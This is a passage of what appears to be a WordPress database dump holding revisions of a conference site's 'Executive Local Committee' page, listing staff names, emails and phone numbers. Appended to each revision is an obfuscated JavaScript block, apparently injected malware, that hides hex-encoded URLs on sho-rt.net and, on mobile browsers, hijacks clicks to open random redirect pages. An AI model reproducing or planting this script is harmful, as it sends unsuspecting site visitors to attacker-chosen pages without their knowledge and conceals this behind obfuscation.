_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 13:11:06','2023-06-27 13:11:06','',4849,'https://gsw2023.com/?p=4928',0,'revision','',0),
(4929,4,'2023-06-27 13:13:43','2023-06-27 13:13:43','<p>[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\n<p>[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: +203 5497598</td>\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 11pt;\">nashwa.elbendary@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871415968{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687871444230{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/aast2.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 13:13:43','2023-06-27 